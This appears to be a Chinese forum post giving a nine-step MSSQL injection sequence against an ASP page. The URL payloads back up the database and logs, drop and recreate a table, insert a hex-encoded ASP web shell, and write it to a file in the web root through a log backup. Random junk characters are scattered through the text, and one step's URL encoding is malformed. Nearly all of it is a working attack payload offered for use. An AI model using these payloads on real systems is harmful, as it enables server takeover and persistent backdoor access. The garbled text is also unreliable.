第一步
5 |5 X" T9 |: mhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
# M# q) T' w' I, A) p: m2 L: @/ G2 L: t' |
第二步:
* h2 P L6 Y2 \' R+ F$ \2 d3 yhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
3 J1 s& }2 d* ]( G
( l5 P; t( l, `8 ^+ B4 @1 U第三步+ K' u' `2 Z8 q/ ~" [ |/ _% y- ?
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--1 U6 [9 h9 ~/ f- M' p
, U2 R/ x' {8 O. r5 b+ h/ O第四步4 ^" \- Q: X8 d; \2 X
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
+ {# x4 |: I* U
/ `$ O) Z" B! y) Q' [; l V' |6 S4 w第五步
2 k* u4 E6 D; q$ shttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--6 N; b4 B8 g7 ~
! @3 ]7 W' y% F% K% p4 u0 r$ f
第六步
/ k' \3 v* E5 H4 z! n# G: uhttp://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--. G/ U, R* I2 [8 j$ W, z8 m; W
v# H4 H4 b! l, r& F6 {6 I
第七步
( L, a, ?0 k4 ~http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
& X& {$ e8 C, d/ v+ B
, |0 C9 h8 l) e4 J" q第八步; ^0 u; k# E4 x
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
% y3 r; l( T- M6 I- A; M: i: Y" {# h* q. ?- g6 S: l. u7 o
第九步
- f6 T3 w. n. f+ G/ X0 |' qhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
$ T9 {% A9 W6 ~' S6 {6 D" K |